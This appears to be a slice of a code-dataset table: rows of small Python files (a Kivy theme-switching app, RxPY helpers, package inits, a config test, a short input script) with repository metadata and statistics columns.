with args[0].parent.parent.parent.canvas.before:
Color(rgba = (.749,.333,.925,1)),
Rectangle(pos=args[0].parent.parent.parent.pos, size=(max(args[0].parent.parent.parent.size)+200,max(args[0].parent.parent.parent.size)+200))
def callback8(self, *args):
out_file = open("./json/theme.json","w")
theme = {'theme': '.2,.431,.482,1'}
json.dump(theme,out_file, indent=4)
out_file.close()
with args[0].parent.parent.parent.canvas.before:
Color(rgba = (.2,.431,.482,1)),
Rectangle(pos=args[0].parent.parent.parent.pos, size=(max(args[0].parent.parent.parent.size)+200,max(args[0].parent.parent.parent.size)+200))
def callback9(self, *args):
out_file = open("./json/theme.json","w")
theme = {'theme': '.149,.560,.356,1'}
json.dump(theme,out_file, indent=4)
out_file.close()
with args[0].parent.parent.parent.canvas.before:
Color(rgba = (.149,.560,.356,1)),
Rectangle(pos=args[0].parent.parent.parent.pos, size=(max(args[0].parent.parent.parent.size)+200,max(args[0].parent.parent.parent.size)+200))
def callback10(self, *args):
out_file = open("./json/theme.json","w")
theme = {'theme': '.949,.470,.294,1'}
json.dump(theme,out_file, indent=4)
out_file.close()
with args[0].parent.parent.parent.canvas.before:
Color(rgba = (.949,.470,.294,1)),
Rectangle(pos=args[0].parent.parent.parent.pos, size=(max(args[0].parent.parent.parent.size)+200,max(args[0].parent.parent.parent.size)+200))
def callback11(self, *args):
out_file = open("./json/theme.json","w")
theme = {'theme': '.423,.478,.537,1'}
json.dump(theme,out_file, indent=4)
out_file.close()
with args[0].parent.parent.parent.canvas.before:
Color(rgba = (.423,.478,.537,1)),
Rectangle(pos=args[0].parent.parent.parent.pos, size=(max(args[0].parent.parent.parent.size)+200,max(args[0].parent.parent.parent.size)+200))
def callback12(self, *args):
out_file = open("./json/theme.json","w")
theme = {'theme': '.323,.7,.2,1'}
json.dump(theme,out_file, indent=4)
out_file.close()
with args[0].parent.parent.parent.canvas.before:
Color(rgba = (.323,.7,.2,1)),
Rectangle(pos=args[0].parent.parent.parent.pos, size=(max(args[0].parent.parent.parent.size)+500,max(args[0].parent.parent.parent.size)+500))
def callback13(self, *args):
out_file = open("./json/theme.json","w")
theme = {'theme': '.323,.1,.32,1'}
json.dump(theme,out_file, indent=4)
out_file.close()
with args[0].parent.parent.parent.canvas.before:
Color(rgba = (.323,.1,.32,1)),
Rectangle(pos=args[0].parent.parent.parent.pos, size=(max(args[0].parent.parent.parent.size)+500,max(args[0].parent.parent.parent.size)+500))
def callback5(self, *args):
self.open_settings()
args[0].parent.dismiss()
def callback6(self, *args):
out_file = open("./json/theme.json","w")
theme = {'theme': '.323,.2,.7,1'}
json.dump(theme,out_file, indent=4)
out_file.close()
with args[0].parent.parent.parent.canvas.before:
Color(rgba = (.323,.7,.7,1)),
Rectangle(pos=args[0].parent.parent.parent.pos, size=(max(args[0].parent.parent.parent.size)+200,max(args[0].parent.parent.parent.size)+200))
args[0].parent.dismiss()
if __name__ == '__main__':
MainApp().run()
| 48.823466
| 225
| 0.6065
| 5,725
| 45,357
| 4.726463
| 0.097642
| 0.25012
| 0.296685
| 0.292694
| 0.700469
| 0.681252
| 0.661037
| 0.639233
| 0.629624
| 0.612735
| 0
| 0.030436
| 0.227087
| 45,357
| 928
| 226
| 48.876078
| 0.741421
| 0.041471
| 0
| 0.504155
| 0
| 0.01108
| 0.145853
| 0.00511
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.009695
| 0.051247
| null | null | 0.044321
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
d5cba7cd3dcb2222d3851506c1a53a7eee120ef8
| 765
|
py
|
Python
|
modules/google-earth-engine/docker/sepal-ee/sepal/rx/__init__.py
|
BuddyVolly/sepal
|
6a2356a88940a36568b1d83ba3aeaae4283d5445
|
[
"MIT"
] | 153
|
2015-10-23T09:00:08.000Z
|
2022-03-19T03:24:04.000Z
|
modules/google-earth-engine/docker/sepal-ee/sepal/rx/__init__.py
|
BuddyVolly/sepal
|
6a2356a88940a36568b1d83ba3aeaae4283d5445
|
[
"MIT"
] | 165
|
2015-09-24T09:53:06.000Z
|
2022-03-31T09:55:06.000Z
|
modules/google-earth-engine/docker/sepal-ee/sepal/rx/__init__.py
|
BuddyVolly/sepal
|
6a2356a88940a36568b1d83ba3aeaae4283d5445
|
[
"MIT"
] | 46
|
2016-07-10T10:40:09.000Z
|
2021-11-14T01:07:33.000Z
|
from typing import Callable
import rx
from rx import Observable, generate, of
from rx.operators import flat_map
from sepal.rx import operators
from .aside import aside
from .file import using_file
from .subscribe_and_wait import subscribe_and_wait
def forever():
return generate(None, lambda _: True, lambda _: None)
def dispose():
operators._dispose.on_next(True)
def throw(e):
# noinspection PyBroadException
try:
raise e
except Exception:
return rx.throw(e)
def flat_map_of(action: Callable) -> Callable[[Observable], Observable]:
return flat_map(lambda _: action())
def merge_finalize(handler: Callable[[], Observable]) -> Observable:
return of(True).pipe(
operators.merge_finalize(handler)
)
| 20.675676
| 72
| 0.722876
| 99
| 765
| 5.424242
| 0.40404
| 0.039106
| 0.05959
| 0.126629
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.189542
| 765
| 36
| 73
| 21.25
| 0.866129
| 0.037909
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.217391
| false
| 0
| 0.347826
| 0.130435
| 0.73913
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 5
|
d5d0ca84ef5e1cf4dc518ab2ff18626ab2b70e74
| 181
|
py
|
Python
|
kungfucms/apps/api/__init__.py
|
youngershen/kungfucms
|
1a4371606166eedcab693706d388071f849a4259
|
[
"MIT"
] | null | null | null |
kungfucms/apps/api/__init__.py
|
youngershen/kungfucms
|
1a4371606166eedcab693706d388071f849a4259
|
[
"MIT"
] | 4
|
2021-03-30T13:27:30.000Z
|
2021-09-22T19:03:49.000Z
|
kungfucms/apps/api/__init__.py
|
youngershen/kungfucms
|
1a4371606166eedcab693706d388071f849a4259
|
[
"MIT"
] | null | null | null |
# PROJECT : kungfucms
# TIME : 2020/6/8 10:50
# AUTHOR : Younger Shen
# EMAIL : shenyangang@163.com
# PHONE : 13811754531
# WECHAT : 13811754531
# https://github.com/youngershen
| 22.625
| 32
| 0.701657
| 23
| 181
| 5.521739
| 0.913043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.233333
| 0.171271
| 181
| 7
| 33
| 25.857143
| 0.613333
| 0.917127
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
d5d239a865f85d59a091c2d85f5599f3dddfaec8
| 57
|
py
|
Python
|
utils/heatmap/__init__.py
|
SERI-EPI-DS/pterygium_detection
|
5d56896cec4f154bd5e10ddf4db079b1e8d8564d
|
[
"MIT"
] | null | null | null |
utils/heatmap/__init__.py
|
SERI-EPI-DS/pterygium_detection
|
5d56896cec4f154bd5e10ddf4db079b1e8d8564d
|
[
"MIT"
] | null | null | null |
utils/heatmap/__init__.py
|
SERI-EPI-DS/pterygium_detection
|
5d56896cec4f154bd5e10ddf4db079b1e8d8564d
|
[
"MIT"
] | null | null | null |
from .allcam import AllCAM
from .heatmap_utils import *
| 19
| 28
| 0.789474
| 8
| 57
| 5.5
| 0.625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.157895
| 57
| 2
| 29
| 28.5
| 0.916667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
d5dda655f115012f16e5ad8069c861dc1b8cbded
| 22
|
py
|
Python
|
data/dataset/__init__.py
|
Shashank-Holla/motleyNet
|
05a8c758f650a90f5f53e51bb89909fdc1b735f4
|
[
"MIT"
] | null | null | null |
data/dataset/__init__.py
|
Shashank-Holla/motleyNet
|
05a8c758f650a90f5f53e51bb89909fdc1b735f4
|
[
"MIT"
] | null | null | null |
data/dataset/__init__.py
|
Shashank-Holla/motleyNet
|
05a8c758f650a90f5f53e51bb89909fdc1b735f4
|
[
"MIT"
] | null | null | null |
from .CIFAR10 import *
| 22
| 22
| 0.772727
| 3
| 22
| 5.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.105263
| 0.136364
| 22
| 1
| 22
| 22
| 0.789474
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
914205fa494f53fa929db28f20d7b4d1f812346c
| 175
|
py
|
Python
|
tests/test_system.py
|
piotr-szpetkowski/straal-python
|
f72fe0aed734bf5439c4ddee9bc9bad12f619c33
|
[
"Apache-2.0"
] | null | null | null |
tests/test_system.py
|
piotr-szpetkowski/straal-python
|
f72fe0aed734bf5439c4ddee9bc9bad12f619c33
|
[
"Apache-2.0"
] | null | null | null |
tests/test_system.py
|
piotr-szpetkowski/straal-python
|
f72fe0aed734bf5439c4ddee9bc9bad12f619c33
|
[
"Apache-2.0"
] | null | null | null |
import straal
def test_straal_config_is_mocked(straal_base_url):
assert straal.get_api_key() == "DUMMY_TEST_API_KEY"
assert straal.get_base_url() == straal_base_url
| 25
| 55
| 0.788571
| 28
| 175
| 4.392857
| 0.5
| 0.170732
| 0.211382
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125714
| 175
| 6
| 56
| 29.166667
| 0.803922
| 0
| 0
| 0
| 0
| 0
| 0.102857
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.25
| false
| 0
| 0.25
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
9143ae25b490e4108be1ac3036a402ddb1130043
| 130
|
py
|
Python
|
reto 1/felizmente.py
|
SeaWar741/CodingRush2017
|
3dc41e82fa0261148dee4db5d80033387c958d5d
|
[
"Apache-2.0"
] | null | null | null |
reto 1/felizmente.py
|
SeaWar741/CodingRush2017
|
3dc41e82fa0261148dee4db5d80033387c958d5d
|
[
"Apache-2.0"
] | null | null | null |
reto 1/felizmente.py
|
SeaWar741/CodingRush2017
|
3dc41e82fa0261148dee4db5d80033387c958d5d
|
[
"Apache-2.0"
] | null | null | null |
n = int(raw_input)
k = int(raw_input)
p = 1
for i in range(n):
x = int(raw_input)
if x < k:
p +=1
print p
| 14.444444
| 23
| 0.5
| 26
| 130
| 2.384615
| 0.538462
| 0.290323
| 0.532258
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.02439
| 0.369231
| 130
| 8
| 24
| 16.25
| 0.731707
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.125
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.